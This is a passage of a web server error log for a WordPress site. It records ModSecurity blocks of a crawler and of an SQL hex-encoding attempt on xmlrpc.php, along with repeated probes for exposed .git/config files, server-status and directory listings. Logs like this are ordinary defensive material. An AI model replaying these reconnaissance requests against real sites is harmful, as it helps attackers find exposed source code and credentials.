84.239.37.11:60688] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z-XEKVVC5Z1Rnn_Iw013TAAAAIQ"] [Thu Mar 27 16:33:54.933439 2025] [:error] [pid 32547:tid 139902897309440] [client 84.239.37.11:60690] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Z-XEQlXmiWSDeB1Mp1xmFAAAAEs"] [Thu Mar 27 16:33:55.022885 2025] [:error] [pid 658:tid 139902872131328] [client 84.239.37.11:60692] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z-XEQ75Qf0_71MgEiowt_gAAAM4"] [Thu Mar 27 16:33:58.182800 2025] [:error] [pid 32549:tid 139902939272960] [client 84.239.37.11:60694] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Z-XERlVC5Z1Rnn_Iw013TQAAAIY"] [Thu Mar 27 16:33:58.226272 2025] [:error] [pid 32547:tid 139902846953216] [client 84.239.37.11:60696] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z-XERlXmiWSDeB1Mp1xmFQAAAFE"] [Thu Mar 27 16:33:58.261832 2025] [:error] [pid 32546:tid 139902930880256] [client 84.239.37.11:60698] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Z-XERqKrf8nziKHLDs9aQwAAAAc"] [Thu Mar 27 16:33:59.357308 2025] [:error] [pid 658:tid 139902880524032] [client 84.239.37.11:60700] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z-XER75Qf0_71MgEiowt_wAAAM0"] [Fri Mar 28 00:35:55.395419 2025] [autoindex:error] [pid 32546:tid 139902830167808] [client 107.189.19.239:41056] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 28 00:35:59.028348 2025] [autoindex:error] [pid 32546:tid 139902872131328] [client 107.189.19.239:41060] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 28 00:36:08.072934 2025] [autoindex:error] [pid 32546:tid 139902880524032] [client 107.189.19.239:41068] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 28 00:36:17.608505 2025] [autoindex:error] [pid 32547:tid 139902855345920] [client 107.189.19.239:41072] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 28 00:36:21.957161 2025] [autoindex:error] [pid 32546:tid 139902897309440] [client 107.189.19.239:41076] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 28 00:36:32.005320 2025] [autoindex:error] [pid 32547:tid 139902922487552] [client 107.189.19.239:41080] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 28 00:36:34.878389 2025] [autoindex:error] [pid 32547:tid 139902964451072] [client 107.189.19.239:41084] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 28 00:36:43.118123 2025] [autoindex:error] [pid 32547:tid 139902788204288] [client 107.189.19.239:41088] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 28 05:37:15.006252 2025] [authz_core:error] [pid 15868:tid 140622233159424] [client 164.90.228.79:45550] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/28 05:37:21 [error] 15830#15830: *484511 access forbidden by rule, client: 164.90.228.79, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Mar 28 10:51:00.163663 2025] [autoindex:error] [pid 15867:tid 140622019110656] [client 213.136.81.226:49280] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Fri Mar 28 10:51:02.502541 2025] [autoindex:error] [pid 15868:tid 140622010717952] [client 213.136.81.226:49292] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Fri Mar 28 10:51:03.925239 2025] [autoindex:error] [pid 15867:tid 140622052681472] [client 213.136.81.226:49296] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Fri Mar 28 10:51:05.318056 2025] [autoindex:error] [pid 16431:tid 140622052681472] [client 213.136.81.226:49300] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com 2025/03/28 14:35:34 [error] 15830#15830: *488831 access forbidden by rule, client: 89.248.165.249, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/28 14:35:34 [error] 15830#15830: *488832 access forbidden by rule, client: 89.248.165.249, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/28 14:35:34 [error] 15830#15830: *488833 access forbidden by rule, client: 89.248.165.249, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/28 14:35:34 [error] 15829#15829: *488835 access forbidden by rule, client: 89.248.165.249, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/28 14:35:34 [error] 15830#15830: *488836 access forbidden by rule, client: 89.248.165.249, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/28 14:35:34 [error] 15830#15830: *488837 access forbidden by rule, client: 89.248.165.249, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/28 14:35:35 [error] 15830#15830: *488840 access forbidden by rule, client: 89.248.165.249, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/28 14:35:35 [error] 15830#15830: *488838 access forbidden by rule, client: 89.248.165.249, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Mar 28 21:27:48.384722 2025] [autoindex:error] [pid 32409:tid 140622061074176] [client 20.192.14.20:58438] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 28 21:53:34.412220 2025] [:error] [pid 15868:tid 140622207981312] [client 103.71.170.197:58862] [client 103.71.170.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z-dgrikpUJG7VLy-yEcphAAAAIU"] 2025/03/29 20:06:52 [error] 2637#2637: *501852 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /source/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2637#2637: *501853 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /scripts/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501855 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2637#2637: *501850 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /staging/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2637#2637: *501851 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501848 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /static../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501860 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /src/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501849 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /files/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501861 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /panel/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2637#2637: *501854 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /laravel/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501856 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /lib/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501862 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /frontend/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2637#2637: *501858 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501864 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /js../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:52 [error] 2638#2638: *501865 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /test/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:53 [error] 2637#2637: *501870 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:53 [error] 2638#2638: *501871 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:53 [error] 2638#2638: *501872 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:56 [error] 2638#2638: *501873 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:56 [error] 2638#2638: *501863 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /logs/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:56 [error] 2638#2638: *501859 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /www/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:56 [error] 2638#2638: *501866 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/29 20:06:56 [error] 2638#2638: *501857 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /docs/.git/config HTTP/1.1", host: "mail.investigacionperu.com"